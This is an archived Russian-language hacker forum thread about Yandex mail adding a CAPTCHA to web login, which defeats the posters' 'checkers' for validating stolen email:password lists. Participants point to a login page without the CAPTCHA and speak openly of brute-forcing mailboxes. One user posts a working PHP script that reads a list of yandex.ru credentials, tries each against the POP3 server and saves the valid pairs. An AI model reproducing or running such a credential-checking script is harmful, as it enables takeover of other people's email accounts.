PDA

Просмотр полной версии : yandex авторизация


genom--
29.05.2007, 23:06
сегодня по делам запустил свой чекер мыл на валид чекал яндекс и смотрю все мыла идут в бэд --- зашел на сайт посмотрел они ввели картинку с вводом цифр при авторизации --- еще толком не разберался в ответах сервера на запросы авторизации может какнибуть можно будет сделать чекер или брутер -- но факт остается фактом вроде поставили новую защиту

ps -- если боян и оно там уже висит давно -- то хз я им часто не пользуюсь

freddi
29.05.2007, 23:10
давно, месяц гдето. мой папа каждый день когда заходит в почту сильно выругивается)

Digimortal
29.05.2007, 23:53
там вроде как картинка вылазит тока после нескольких неудачных авторизаций, и уже давно это было сделано..

genom--
30.05.2007, 00:17
хз до последнего времени я чекал по несколько сотен акко и нормально было а в этот раз вот какое дело вышло =(

F!$T
30.05.2007, 08:50
freddi - прав. Картинка появляется только после неудачной авторизации. А если ты зайдешь на http://mail.yandex.ru/classic/ - то никакой картинки не будет. ИМХО брутить надо другие ящики =)

Scipio
30.05.2007, 10:45
freddi - прав. Картинка появляется только после неудачной авторизации. А если ты зайдешь на http://mail.yandex.ru/classic/ - то никакой картинки не будет. ИМХО брутить надо другие ящики =)

а причем здесь это? чеккер же не на 80 порту работает... кстати а на чем чеккер то написан?

если perl... php.. давай скрипты

freddi
30.05.2007, 10:59
"Картинка появляется только после неудачной авторизации"

если пароль правильно ввести он тоже перебросит на авторизацию с картинкой. у них новый метод защиты.

Scipio
30.05.2007, 11:16
вот скрипт он работает щас накатал

<?php
error_reporting(E_ALL);
set_time_limit(0);
$fr=fopen("resu","r");
$fw=fopen("resu1","w");
echo "<pre>";
while (!feof ($fr)) {
$buffer = fgets($fr,255);
$lp=explode(':',$buffer,2);
$log=explode('@',$lp[0],2);

if (($log[1]=='yandex.ru') and (isset($lp[1]))){

$ock=fsockopen("pop.yandex.ru",110);
$html=fgets($ock);
$usr="user ".$log[0]."\r\n";
fputs($ock,$usr);
$html=fgets($ock);
$pwr="pass ".$lp[1]."\r\n";
fputs($ock,$pwr);
echo $buffer;
$html=fgets($ock);
echo $html."\r\n";
if (preg_match("/OK/",$html)) {
fputs($fw,$buffer);
fclose($ock);}
else {fclose($ock);}
}
}
echo "OK!";
echo "</pre>";
fclose($fr);
fclose($fw);
?>

в resu - мыльники и пароли формата: dfdff@yandex.ru:eerdf

в resu1 будут валиды


Ну че ктонить попробовал? самому интересно, а то лист мыльников небольшой у меня был...

genom--
03.06.2007, 20:57
Scipio если ты не заметил то речь идет о веб авторизации а не о pop сервере =) -- так можно и через брутус проверить

BlackCats
03.06.2007, 22:01
хз, у меня нету картинкиЮ даже когда ошибся - она не появилась...